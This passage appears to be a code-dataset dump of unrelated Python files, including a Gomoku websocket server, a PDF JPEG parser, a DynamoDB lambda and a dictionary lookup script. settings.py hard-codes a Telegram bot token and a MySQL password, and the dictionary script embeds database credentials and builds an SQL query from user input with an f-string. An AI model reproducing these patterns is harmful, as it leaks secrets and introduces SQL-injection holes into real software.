numStudents = int(raw_input(\"How many students took the test: \"))\n scores = enterScores(numStudents)\n printAverage(scores)\n end = raw_input(\"Do you want to end program? 
(Enter no to process a new set of scores): \")\n if end == \"yes\":\n break\n\n\nmain()","sub_path":"2017 Fall/SODV1101 Programming/pf_fall2017_pa4/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"262159207","text":"import asyncio\nimport json\nimport uuid\nfrom asyncio import CancelledError\n\nimport aiohttp\nfrom aiohttp import BasicAuth, web\nfrom aiohttp.web_response import Response\n\nfrom server.communication.network_player import NetworkPlayer\nfrom server.communication.session import ServerSession\nfrom server.gomokulogic.game_player import GamePlayer\nfrom server.gomokulogic.gomoku import GameState, GomokuGameLogicManager, GameException\n\n\nasync def game_join(request):\n session = ServerSession.get_instance()\n auth_obj = BasicAuth.decode(request.headers['Authorization'])\n current_user = await session.validate_user_credentials(auth_obj.login, auth_obj.password)\n game_idn = request.match_info['game_idn']\n game = await session.get_game(game_idn)\n\n ws = web.WebSocketResponse()\n await ws.prepare(request)\n me = NetworkPlayer(ws, current_user['username'])\n\n if game.player1 is None:\n me.player_id = 1\n init_game(game)\n game.player1 = me\n my_player = game.game_player1\n await game.event.wait()\n await me.send_response(game.board.get_response())\n else:\n me.player_id = 2\n game.player2 = me\n my_player = game.game_player2\n game.event.set()\n await me.send_response(game.board.get_response())\n\n while True:\n try:\n msg = await me.receive()\n if msg.type == aiohttp.WSMsgType.text:\n data = json.loads(msg.data)\n x = int(data['x'])\n y = int(data['y'])\n response = game.board.make_move(my_player, x, y)\n if isinstance(response, GameException):\n await me.send_exception(response.exception)\n else:\n await game.player1.send_response(response)\n await game.player2.send_response(response)\n else:\n break\n except CancelledError:\n break\n return ws\n\n\ndef init_game(game):\n game.event = asyncio.Event()\n game.game_player1 = GamePlayer()\n game.game_player2 = GamePlayer()\n game.board = GomokuGameLogicManager(game.game_player1, game.game_player2)\n","sub_path":"server/communication/endpoints/game_join_endpoint.py","file_name":"game_join_endpoint.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"89169928","text":"import multiprocessing\nfrom functools import partial\nfrom contextlib import contextmanager\n\n@contextmanager\ndef poolcontext(*args, **kwargs):\n pool = multiprocessing.Pool(*args, **kwargs)\n yield pool\n pool.terminate()\n\ndef merge_names(a, b,c):\n if c==1:\n return '{} & {}'.format(a, b)\n else:\n return '{} & {}'.format(b, a)\n \nif __name__ == '__main__':\n names = ['Brown', 'Wilson', 'Bartlett', 'Rivera', 'Molloy', 'Opie']\n with poolcontext(processes=3) as pool:\n results = pool.map(partial(merge_names, b='lllllll',c=2), names)\n print(results)","sub_path":"TestM1.py","file_name":"TestM1.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"603857915","text":"import inspect\n\n\ndef get_all_measures():\n from measurement import measures\n\n m = []\n for name, obj in inspect.getmembers(measures):\n if inspect.isclass(obj):\n m.append(obj)\n return m\n\n\ndef guess(value, unit, measures=None):\n if measures is None:\n measures = 
get_all_measures()\n for measure in measures:\n try:\n return measure(**{unit: value})\n except AttributeError:\n pass\n raise ValueError(\n \"No valid measure found for %s %s; checked %s\"\n % (value, unit, \", \".join([m.__name__ for m in measures]))\n )\n","sub_path":"measurement/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"55258386","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/92341\n\n\"\"\"\nfee -> 기본 시간(분), 기본 요금(원). 단위 시간(분), 단위 요금(원)\nrecords -> 시각, 차량번호, 내역 (공백으로 구분)\n\"\"\"\n\nimport math\nfrom collections import Counter\n\ndef solution(fees, records):\n default_time, default_fee, unit_time, unit_fee = fees\n \n # 차 번호 별 입출차 갯수 계산\n car_numbers = dict(Counter(map(lambda x: x.split()[1], records)))\n \n # 출차 기록이 없는 번호는 23:59 추가\n for car in car_numbers.items():\n if car[1] % 2 != 0:\n records.append(f'23:59 {car[0]} OUT')\n \n # 차량 번호, 시간, 내역 순으로 정렬\n records.sort(key=lambda x: (x.split()[1], x.split()[0], x.split()[2]))\n \n # 차량 별 누적 시간\n sum_time = {}\n for index, record in enumerate(records):\n time, car, history = record.split()\n \n # 출차 시간인 경우\n if history == \"OUT\":\n # 입차 시간\n in_time = records[index - 1].split()[0]\n sub_hour = int(time.split(':')[0]) - int(in_time.split(':')[0])\n sub_minute = int(time.split(':')[1]) - int(in_time.split(':')[1])\n \n # 실제 주차 시간\n sub_time = 60 * sub_hour + sub_minute\n \n if car in sum_time:\n sum_time[car] += sub_time\n else:\n sum_time[car] = sub_time\n \n answer = []\n for time in sum_time.values():\n # 최종 요금\n if time <= default_time:\n answer.append(default_fee)\n else:\n answer.append(default_fee + math.ceil((time - default_time) / unit_time) * unit_fee)\n \n return answer\n \nprint(solution([180, 5000, 10, 600], [\"05:34 5961 IN\", \"06:00 0000 IN\", \"06:34 0000 OUT\", \"07:59 5961 OUT\", \"07:59 0148 IN\", \"18:59 0000 IN\", \"19:09 0148 OUT\", \"22:59 5961 IN\", \"23:00 5961 OUT\"]))","sub_path":"python_/programmers/Lv.2/주차 요금 계산.py","file_name":"주차 요금 계산.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"39669872","text":"'''\n@version : 1.0\n@Author : lh-13\n@Date : 2021-01-07 10:15:44\n@LastEditors : lh-13\n@LastEditTime : 2021-01-07 10:15:45\n@Descripttion : 自己实现的knn算法(k近邻)\n@FilePath : /pytorch_test/knn.py\n'''\n\n'''\n6个训练样本,分为三类,每个样本有4个特征,编号7为我们要预测的\n\n编号 花萼长度(cm) 花萼宽度(cm) 花瓣长度(cm) 花瓣宽度(cm) 名称\n1 4.9 3.1 1.5 0.1 Iris setosa\n2 5.4 3.7 1.5 0.2 Iris setosa\n3 5.2 2.7 3.9 1.4 Iris versicolor\n4 5.0 2.0 3.5 1.0 Iris versicolor\n5 6.3 2.7 4.9 1.8 Iris virginica\n6 6.7 3.3 5.7 2.1 Iris virginica\n7 5.5 2.5 4.0 1.3 ?\n'''\n\n#计算测试样本到各个训练样本的距离\n\nimport numpy as np \n\ndef CalcDistance(listA, listB):\n diff = listA - listB #减\n squareDiff = diff**2 #平方\n squareDist = np.sum(squareDiff) #和(axis=1表示行)\n distance = squareDist ** 0.5 #开根号\n\n return distance \n\n\nif __name__ == '__main__':\n testData = np.array([5.5, 2.5, 4.0, 1.3])\n print(\"Distance to 1:\", CalcDistance(np.array([4.9, 3.1, 1.5, 0.1]), testData))\n print(\"Distance to 2:\", CalcDistance(np.array([5.4, 3.7, 1.5, 0.2]), testData))\n print(\"Distance to 3:\", CalcDistance(np.array([5.2, 2.7, 3.9, 1.4]), testData))\n print(\"Distance to 4:\", CalcDistance(np.array([5.0, 2.0, 3.5, 1.0]), testData))\n print(\"Distance to 5:\", CalcDistance(np.array([6.3, 2.7, 4.9, 1.8]), testData))\n print(\"Distance to 6:\", 
CalcDistance(np.array([6.7, 3.3, 5.7, 2.1]), testData))\n \n\n","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"477175095","text":"'''\nCopyright 2018 Riverstone Software, LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\nimport argparse\nfrom os import environ\n\nfrom github import Github\n\nPARSER = argparse.ArgumentParser(\n description='''Riverstone CLI is a command line utility for Riverstone\n employees. This utility automates routinely used commands and\n procedures used at Riverstone.'''\n)\n\nSUBPARSER = PARSER.add_subparsers(dest=\"commands\")\n\nGITHUB = Github(environ.get('RSCLI_GITHUB_KEY'))\n\n\nLABELS = {\n 'RFR': 'RFR',\n 'WIP': 'WIP'\n}\n","sub_path":"riverstone_cli/common/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"277186874","text":"from pathlib import Path\n\n\nTOKEN = '1891854677:AAGdDC2MEkq-EQOvwuiIdqz9Kn94xOUFHBI'\n\n# this is the src folder \nBASE_DIR = Path(__file__).resolve().parent.parent\n\nMYSQL_CONNECTION = {\n 'user': 'root',\n 'password': 'adelante5225',\n 'host': '127.0.0.1',\n 'use_pure':True,\n 'connection_timeout':1000\n}\n\nQUERIES_DIR = BASE_DIR / 'queries'\n\nVENV_FOLDERNAME = '.venv'\n\nVENV_PYTHON_PATH = (BASE_DIR.parent / VENV_FOLDERNAME / \"Scripts\" / \"python.exe\")\n\nBOTMAIN_FILENAME = 'bot_main'\n\nBOT_MAIN_PATH = BASE_DIR/f'{BOTMAIN_FILENAME}.py'\n\nREQUIREMENTS_FILENAME = 'requirements.txt'\n\nDATABASE_NAME = 'new_schema'\n\nNUMBER_OF_QUESTIONS = 5\n\nCHECK_EMOJI = \"⭕️\"\n\nNUMBER_OF_USERS_FOR_SESSION = 2","sub_path":"src/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"121827310","text":"import os\nimport sys\n\nimport pygame\nimport requests\n\npygame.init()\n\ncoords = [37.615560, 55.752220]\nzoom = 1\nlook = ['map', 'sat', 'sat,skl']\ncurrent_look = 0\n\ndef map_req(zoom, coords, l):\n global look\n response = None\n map_request = \"http://static-maps.yandex.ru/1.x/?ll={},{}&spn={},{}&l={}\".format(coords[0], coords[1], zoom, zoom, look[l])\n response = requests.get(map_request)\n if not response:\n print(\"Ошибка выполнения запроса:\")\n print(map_request)\n print(\"Http статус:\", response.status_code, \"(\", response.reason, \")\")\n sys.exit(1)\n map_file = \"map.png\"\n with open(map_file, \"wb\") as file:\n file.write(response.content)\n return map_file\n\n\nm_f = map_req(zoom, coords, current_look)\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n os.remove(m_f)\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_PAGEUP:\n zoom *= 1.1\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_PAGEDOWN:\n zoom /= 1.1\n m_f = 
map_req(zoom, coords, current_look)\n if event.key == pygame.K_RIGHT:\n coords[0] += 0.1\n coords[0] = coords[0] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_LEFT:\n coords[0] -= 0.1\n coords[0] = coords[0] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_UP:\n coords[1] += 0.1\n coords[1] = coords[1] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_DOWN:\n coords[1] -= 0.1\n coords[1] = coords[1] % 180\n m_f = map_req(zoom, coords, current_look)\n if event.key == pygame.K_HOME:\n current_look += 1\n current_look = current_look % 3\n m_f = map_req(zoom, coords, current_look)\n screen = pygame.display.set_mode((600, 450))\n screen.blit(pygame.image.load(m_f), (0, 0))\n pygame.display.flip()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"505506081","text":"# -*- coding: utf-8 -*-\n\n##############################\n# 基本设置\n##############################\n# 本地开发时监听的 host 和 port\nTEST_HOST = \"0.0.0.0\"\nTEST_PORT = 8080\n\n# Debug 开关\nDEBUG = False\n# Test 开关\nTESTING = False\n# 日志配置文件\nLOG_CONFIG_FILE = \"./log.conf\"\n# 模板目录名\nTEMPLATE_FOLDER = \"templates\"\n# 需要加载的模块列表\nMODULES = [\n \"webapp.core\",\n \"webapp.main\",\n]\n\n##############################\n# session 相关\n##############################\n#SESSION_TYPE = \"filesystem\"\n#SECRET_KEY = '123456'\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"55774556","text":"'''\nUtility functions shared between multiple flit subcommands.\n'''\n\nimport os\nimport sys\n\ndef process_in_file(infile, dest, vals, overwrite=False):\n '''\n Process a file such as 'Makefile.in' where there are variables to\n replace.\n\n @param infile: input file. Usually ends in \".in\"\n @param dest: destination file. 
If overwrite is False, then destination\n shouldn't exist, otherwise a warning is printed and nothing is\n done.\n @param vals: dictionary of key -> val where we search and replace {key}\n with val everywhere in the infile.\n '''\n if not overwrite and os.path.exists(dest):\n print('Warning: {0} already exists, not overwriting'.format(dest),\n file=sys.stderr)\n return\n with open(infile, 'r') as fin:\n with open(dest, 'w') as fout:\n fout.write(fin.read().format(**vals))\n\n\n","sub_path":"scripts/flitcli/flitutil.py","file_name":"flitutil.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"217625370","text":"from consts import *\nfrom helpers import get_event_for_user, user_liked_event_get_response\n\n\n'''All funcs starting with 'get_rseponse'\nreturn message, attachments and new chat_status'''\n\n\ndef get_response_just_started() -> (str, str, int):\n '''when user has just started chat'''\n message = INITIAL_MESSAGE\n attachments = ''\n new_chat_status = ChatStatuses.SELECTS_WHAT_TO_DO\n return (message, attachments, new_chat_status)\n\n\ndef get_response_seen_event(user_choice, user_id) -> (str, str, int):\n '''user has seen event and has made his choice'''\n if (not user_choice.isdigit()) or \\\n (int(user_choice) not in SEEN_EVENT_CHOICES.values()):\n # user input is invalid\n return (\n DID_NOT_GET_IT_MESSAGE,\n '',\n -1\n )\n\n else:\n user_choice = int(user_choice)\n if user_choice == SEEN_EVENT_CHOICES['Мне нравится это предложение!']:\n message, attachments = user_liked_event_get_response(user_id)\n return (\n message,\n attachments,\n ChatStatuses.SELECTS_WHAT_TO_DO\n )\n\n elif user_choice == SEEN_EVENT_CHOICES['Покажи мне другое']:\n message, attachments = get_event_for_user(user_id)\n return (\n message,\n attachments,\n ChatStatuses.SEEN_EVENT\n )\n\n elif user_choice == SEEN_EVENT_CHOICES['Хочу оставить заявку']:\n return (\n SEND_EVENT_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_EVENT\n )\n\n elif user_choice == SEEN_EVENT_CHOICES['Хочу оставить фидбэк']:\n return (\n SEND_FEEDBACK_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_FEEDBACK\n )\n\n\ndef get_response_selected_what_to_do(user_choice, user_id) -> (str, str, int):\n '''user has selected what to do'''\n if (not user_choice.isdigit()) or \\\n (int(user_choice) not in SELECT_WHAT_TO_DO_CHOICES.values()):\n # user input is invalid\n return (DID_NOT_GET_IT_MESSAGE, '', '')\n\n else:\n user_choice = int(user_choice)\n if user_choice == SELECT_WHAT_TO_DO_CHOICES['Смотреть заявки других']:\n message, attachments = get_event_for_user(user_id)\n return (\n message,\n attachments,\n ChatStatuses.SEEN_EVENT\n )\n\n elif user_choice == SELECT_WHAT_TO_DO_CHOICES['Оставить заявку']:\n return (\n SEND_EVENT_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_EVENT\n )\n\n elif user_choice == SELECT_WHAT_TO_DO_CHOICES['Оставить фидбэк']:\n return (\n SEND_FEEDBACK_MESSAGE,\n '',\n ChatStatuses.WANTS_TO_SEND_FEEDBACK\n )\n\n\ndef get_response_user_must_set_city_or_age() -> (str, str, int):\n '''call this func when user has no city or age on vk'''\n message = USER_MUST_SET_CITY_OR_AGE_MESSAGE\n attachments = ''\n new_chat_status = -1\n return (message, attachments, new_chat_status)\n","sub_path":"src/get_response.py","file_name":"get_response.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"377584908","text":"import struct\nimport traceback\nfrom 
io import BytesIO, BufferedReader\nfrom pathlib import Path\nfrom typing import Union\n\nImageType = Union[str, Path, BytesIO]\nclass PDFImage:\n \"\"\"Class that represents a PDF image.\n\n You can pass the location path (``str`` or ``pathlib.Path`` format) of the\n image, or pass a file-like object (``io.BytesIO``) with the image bytes, the\n extension of the image, and the image name.\n\n Only JPEG image format is supported in this moment.\n\n Args:\n image (str, pathlib.Path, BytesIO): The path or file-like object of the\n image.\n extension (str, optional): If ``image`` is path-like object, this\n argument should contain the extension of the image.\n image_name (str, optional): If ``image`` is path-like object, this\n argument should contain the name of the image. This name should be\n unique among the images added to the same PDF document.\n \"\"\"\n def __init__(\n self, image: ImageType, extension: str=None, image_name: str=None\n ):\n image_bytes = None\n try:\n if isinstance(image, str):\n image_bytes = Path(image).open('rb')\n self.image_name = image\n if extension is None:\n extension = image.rpartition('.')[-1]\n elif isinstance(image, Path):\n image_bytes = image.open('rb')\n self.image_name = str(image)\n if extension is None:\n extension = image.suffix\n elif isinstance(image, BytesIO):\n image_bytes = image\n if image_name is None:\n raise TypeError(\n 'when image is of type io.BytesIO, image_name must be '\n 'provided'\n )\n self.image_name = image_name\n if extension is None:\n raise TypeError(\n 'when image is of type io.BytesIO, extension must be '\n 'provided'\n )\n else:\n raise TypeError(\n 'image must be of type str, pathlib.Path or io.BytesIO'\n )\n\n if not isinstance(extension, str):\n raise TypeError('extension type is str')\n\n if len(extension) > 0 and extension[0] == '.':\n extension = extension[1:]\n\n extension = extension.strip().lower()\n\n if extension in ['jpg', 'jpeg']:\n self.parse_jpg(image_bytes)\n else:\n raise NotImplementedError(\n 'Images of type \"{}\" are not yet supported'.format(extension)\n )\n finally:\n if image_bytes is not None:\n image_bytes.close()\n\n def parse_jpg(self, bytes_: Union[BytesIO, BufferedReader]) -> None:\n \"\"\"Method to extract metadata from a JPEG image ``bytes_`` needed to\n embed this image in a PDF document.\n\n This method creates this instance's attibute ``pdf_obj``, containing\n a dict that can be added to a :class:`pdfme.base.PDFBase` instance as\n a PDF Stream object that represents this image.\n\n Args:\n bytes_ (BytesIO, BufferedReader): A file-like object containing the\n image.\n \"\"\"\n try:\n while True:\n markerHigh, markerLow = struct.unpack('BB', bytes_.read(2))\n if markerHigh != 0xFF or markerLow < 0xC0:\n raise SyntaxError('No JPEG marker found')\n elif markerLow == 0xDA: # SOS\n raise SyntaxError('No JPEG SOF marker found')\n elif (markerLow == 0xC8 or # JPG\n (markerLow >= 0xD0 and markerLow <= 0xD9) or # RSTx\n (markerLow >= 0xF0 and markerLow <= 0xFD)): # JPGx\n continue\n else:\n data_size, = struct.unpack('>H', bytes_.read(2))\n data = bytes_.read(data_size - 2) if data_size > 2 else ''\n if (\n (markerLow >= 0xC0 and markerLow <= 0xC3) or #SOF0-SOF3\n (markerLow >= 0xC5 and markerLow <= 0xC7) or #SOF4-SOF7\n (markerLow >= 0xC9 and markerLow <= 0xCB) or #SOF9-SOF11\n (markerLow >= 0xCD and markerLow <= 0xCF) #SOF13-SOF15\n ):\n depth, h, w, layers = struct.unpack_from('>BHHB', data)\n\n if layers == 3: colspace = b'/DeviceRGB'\n elif layers == 4: colspace = b'/DeviceCMYK'\n else: colspace 
= b'/DeviceGray'\n\n break\n except Exception:\n traceback.print_exc()\n raise ValueError(\n \"Couldn't process image: {}\".format(self.image_name)\n )\n\n bytes_.seek(0)\n image_data = bytes_.read()\n bytes_.close()\n\n self.width = int(w)\n self.height = int(h)\n\n self.pdf_obj = {\n 'Type': b'/XObject',\n 'Subtype': b'/Image',\n 'Width': self.width,\n 'Height': self.height,\n 'ColorSpace': colspace,\n 'BitsPerComponent': int(depth),\n 'Filter': b'/DCTDecode',\n '__skip_filter__': True,\n '__stream__': image_data\n }\n\n","sub_path":"pdfme/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"54420504","text":"import json\nimport os\nimport decimal\n\nTABLE_NAME = os.environ.get('TABLE_NAME', 'undefined table')\n\ndef get_table(context):\n\tif context and hasattr(context, 'table'):\n\t\treturn context.table\n\timport boto3\n\treturn boto3.resource('dynamodb').Table(TABLE_NAME)\n\nclass BotoEncoder(json.JSONEncoder):\n\tdef default(self, o):\n\t\tif isinstance(o, decimal.Decimal):\n\t\t\tif o % 1 > 0:\n\t\t\t\treturn float(o)\n\t\t\telse:\n\t\t\t\treturn int(o)\n\t\tif isinstance(o, set):\n\t\t\treturn list(o)\n\t\treturn super(BotoEncoder, self).default(o)\n\ndef to_json(content):\n\treturn json.dumps(content, cls=BotoEncoder)\n\ndef get_route(event):\n\treturn {\n\t\t'health_check' : health_check,\n\t\t'get_wall_count' : get_wall_count,\n\t\t'create_wall' : create_wall,\n\t\t'get_wall_content' : get_wall_content,\n\t\t'put_wall_content' : put_wall_content,\n\t}.get(__get_operation_name(event))\n\n\ndef routing(event, context, get_route_function=None):\n\troute = (get_route_function or get_route)(event)\n\tif route:\n\t\treturn route(event, context)\n\n\treturn {\n\t\t'statusCode': 404,\n\t\t'body': 'Unknown operation %s.' 
% (__get_operation_name(event)),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef health_check(event, context):\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json('Alive'),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef get_wall_count(event, context):\n\ttable = get_table(context)\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(str(table.item_count) + ' elements in the table.'),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef create_wall(event, context): \n\ttable = get_table(context)\n\twall_id = __get_wall_id(event)\n\tresult = table.put_item(\n\t\tItem={\n\t\t\t'wall_id' : wall_id\n\t\t}\n\t)\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(result),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef get_wall_content(event, context): \n\ttable = get_table(context)\n\twall_id = __get_wall_id(event)\n\tresult = table.get_item(\n\t\tKey={\n\t\t\t'wall_id': wall_id\n\t\t},\n\t\tAttributesToGet=[\n\t\t\t'content',\n\t\t]\n\t)\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(result.get('Item', {}).get('content', {})),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef put_wall_content(event, context): \n\ttable = get_table(context)\n\n\twall_id = __get_wall_id(event)\n\tcontent = json.loads(event['body'], parse_float=decimal.Decimal)\n\t\n\tresult = table.update_item(\n\t\tKey={\n\t\t\t'wall_id': wall_id\n\t\t},\n\t\tAttributeUpdates={\n\t\t\t'content': {\n\t\t\t\t'Value': content\n\t\t\t}\n\t\t}\n\t)\n\t\n\treturn {\n\t\t'statusCode': 200,\n\t\t'body': to_json(result),\n\t\t'headers' : {\n\t\t\t'Cache-Control': 'no-cache'\n\t\t}\n\t}\n\ndef __get_operation_name(event):\n\treturn event.get('requestContext', {}).get('operationName', None)\n\ndef __get_wall_id(event):\n\treturn event.get('pathParameters', {}).get('wall_id', None)","sub_path":"lambda/wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"351770264","text":"import random\nimport argparse\nimport os\nno_plot = False\ntry:\n import numpy as np\n from matplotlib import pyplot as plt\nexcept ModuleNotFoundError:\n no_plot = True\n\n\n'''\nInput: File with repeats downloaded from Pfam database. \nIMPORTANT: \n Format: FASTA\n Gaps: Gaps as \"-\" (dashes)\n'''\n\n\n# -------------------------------------------------------------------\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-F\", help='File name')\nparser.add_argument(\"-P\", help='Plot', action='store_true')\nparser.add_argument(\"-M\", help='Multi (more than 2)', action='store_true')\n\nargs = parser.parse_args()\n\n\n# -------------------------------------------------------------------\nfile_length = 0\nif args.F:\n filename = args.F\n if '.' 
in filename:\n filename = filename.split(\".\")[0]\n num_lines = sum(1 for line in open(f'{filename}.txt'))\n\n# -------------------------------------------------------------------\nwith open(f'{filename}.txt') as file_line:\n maxi = 0\n temp_seq = ''\n sequences = []\n names = []\n values_start = []\n values_end = []\n for i in range(num_lines):\n dana_linia = file_line.readline()\n dana_linia = dana_linia.rstrip()\n if '>' in dana_linia:\n if temp_seq:\n sequences.append(temp_seq)\n temp_seq = ''\n temp = dana_linia.lstrip('>')\n names.append(temp.split('/')[0])\n values_start.append(int(temp.split('/')[1].split('-')[0]))\n values_end.append(int(temp.split('/')[1].split('-')[1]))\n if int(int(temp.split('/')[1].split('-')[1])) > maxi:\n maxi = int(int(temp.split('/')[1].split('-')[1]))\n else:\n temp_seq += dana_linia\n sequences.append(temp_seq)\n\nif not args.P:\n summary = {}\n # # # {name: [[start, end, id, seq], [start, end, id, seq]]} - sort by start position\n for i in range(len(names)):\n if names[i] not in summary:\n temp_list = [[values_start[i], values_end[i], i, sequences[i]]]\n for i1 in range(i + 1, len(names)):\n if names[i] == names[i1]:\n temp_list.append([values_start[i1], values_end[i1], i1, sequences[i1]])\n temp_list.sort(key=lambda i: i[0])\n summary[names[i]] = temp_list\n\n# # # maxcount = 8 (Tyle maksymalnie powtórzeń o tej samej nazwie)\n\n# -----------------------------------------------------------------------\nif args.P:\n if no_plot:\n print('No module Matplotlib, see Readme for more info!')\n exit()\n else:\n x_ticks = np.arange(1, maxi, 400)\n starts_y_axis = [random.random() for i in range(len(values_start))]\n ends_y_axis = [random.random() + 2 for i in range(len(values_end))]\n plt.figure(figsize=(12, 3))\n plt.scatter(values_start, starts_y_axis, s=0.2)\n plt.scatter(values_end, ends_y_axis, s=0.2)\n plt.yticks([0.5, 2.5], ['start', 'end'])\n plt.xticks(x_ticks)\n plt.show()\n\n# -----------------------------------------------------------------------\nif not args.P:\n if args.M:\n max_counts = len(summary[max(summary, key=lambda i: len(summary[i]))])\n for i in range(max_counts+1):\n if i != 0:\n list_of_files = [f'{filename}_{i}_{chr(65 + i1)}.txt' for i1 in range(i)]\n list_of_files2 = []\n for i2 in list_of_files:\n if '/' in i2:\n list_of_files2.append(i2.split('/')[-1])\n list_of_files = list_of_files2\n opened_files = [open(f'files_from_separate_Pfam_to_counts/{i2}', 'w') for i2 in list_of_files]\n for i2 in summary:\n if len(summary[i2]) == i:\n for i3 in range(i):\n opened_files[i3].write(f'>{i2}/{summary[i2][i3][0]}-{summary[i2][i3][1]}\\n')\n opened_files[i3].write(f'{summary[i2][i3][3]}\\n')\n for i4 in opened_files:\n i4.close()\n else:\n if '/' in filename:\n filename = filename.split('/')[-1]\n A_part = open(f'files_from_separate_Pfam_to_counts/{filename}_2_A.txt', 'w')\n B_part = open(f'files_from_separate_Pfam_to_counts/{filename}_2_B.txt', 'w')\n for i in summary:\n if len(summary[i]) == 2:\n A_part.write(f'>{i}/{summary[i][0][0]}-{summary[i][0][1]}\\n')\n A_part.write(f'{summary[i][0][3]}\\n')\n B_part.write(f'>{i}/{summary[i][1][0]}-{summary[i][1][1]}\\n')\n B_part.write(f'{summary[i][1][3]}\\n')\n\n","sub_path":"separate_Pfam_to_counts.py","file_name":"separate_Pfam_to_counts.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"260701076","text":"#!/usr/local/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport cv2\n\nimg 
= cv2.imread('bat.jpg')\nblurred = cv2.GaussianBlur(img, (3, 3), 0)\ngray_image = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"Frame\", gray_image)\nret,thresh1 = cv2.threshold(gray_image,127,255,cv2.THRESH_BINARY)\nv = np.median(blurred)\nlower = int(max(0, (1.0 - 0.33) * v))\nupper = int(min(255, (1.0 + 0.33) * v))\nedges = cv2.Canny(blurred, lower, upper)\n\n\n\n_, contours, _ = cv2.findContours(edges, 1, 2)\ncnt = contours[0]\n\nrect = cv2.minAreaRect(cnt)\nbox = cv2.boxPoints(rect)\nbox = np.int0(box)\ncv2.drawContours(edges,[box],0,(0,0,255),2)\ncv2.imshow(\"Frame\", thresh1)\nkey = cv2.waitKey(1) & 0xFF\nraw_input()","sub_path":"bat.py","file_name":"bat.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"584294721","text":"import mysql.connector\nfrom difflib import get_close_matches\nimport json\n\ndata = json.load(open(\"../files/data.json\"))\n\n\ncon = mysql.connector.connect(\n    user = \"ardit700_student\",\n    password = \"ardit700_student\",\n    host = \"108.167.140.122\",\n    database = \"ardit700_pm1database\"\n)\n\ncursor = con.cursor()\n\n\ndef define(word):\n    # query = cursor.execute(\"SELECT Definition FROM Dictionary WHERE Expression = '%s'\" % word)\n    query = cursor.execute(f\"SELECT Definition FROM Dictionary WHERE Expression = '{word}'\")\n    results = cursor.fetchall()\n    if results:\n        for result in results:\n            print(result[0])\n    elif len(get_close_matches(word, data.keys())) > 0:\n        # yn 